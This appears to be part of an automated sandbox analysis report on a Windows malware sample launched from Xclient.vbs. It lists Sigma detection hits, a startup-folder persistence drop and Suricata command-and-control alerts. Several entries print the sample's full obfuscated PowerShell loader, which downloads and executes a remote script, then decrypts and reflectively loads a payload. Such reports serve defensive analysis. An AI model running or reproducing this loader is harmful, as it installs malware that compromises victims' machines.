W0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Suspicious PowerShell Parameter Substring
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", ProcessId: 7292, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cdd.dll, NewProcessName: C:\Windows\System32\cdd.dll, OriginalFileName: C:\Windows\System32\cdd.dll, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: cdd.dll
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs", ProcessId: 7292, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5368, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7456, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:45:02.726844+010028033053Unknown Traffic192.168.2.450015204.79.197.203443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:43:34.598628+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:43:46.191438+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:43:52.078578+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:43:57.814150+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:44:09.424409+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:44:16.132806+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:44:22.079816+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:44:30.539595+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449741TCP
                2025-02-15T20:45:39.955536+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.450051TCP
                2025-02-15T20:45:52.079853+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.450051TCP
                2025-02-15T20:45:53.777058+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.450051TCP
                2025-02-15T20:45:59.163248+010028528701Malware Command and Control Activity Detected185.241.208.2157000192.168.2.450051TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:43:34.624385+010028529231Malware Command and Control Activity Detected192.168.2.449736185.241.208.2157000TCP
                2025-02-15T20:43:46.192912+010028529231Malware Command and Control Activity Detected192.168.2.449736185.241.208.2157000TCP
                2025-02-15T20:43:57.853712+010028529231Malware Command and Control Activity Detected192.168.2.449736185.241.208.2157000TCP
                2025-02-15T20:44:06.772243+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:06.996526+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.124893+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.234396+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.344034+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.468544+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.578359+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.703005+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.812533+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.921690+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.041096+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.140675+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.250084+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.359472+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.484168+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.615357+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.718633+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.827953+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.947197+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.046727+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.170616+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.285823+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.456448+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.625333+010028529231Malware Command and Control Activity Detected192.168.2.449736185.241.208.2157000TCP
                2025-02-15T20:44:09.718568+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.828072+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.937533+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.074336+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.187410+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.296806+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.417846+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.532933+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.640672+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.750825+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.866817+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.985467+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.126720+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.250700+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.436495+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.482756+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.635622+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.752453+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.917801+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.232133+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.399346+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.536215+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
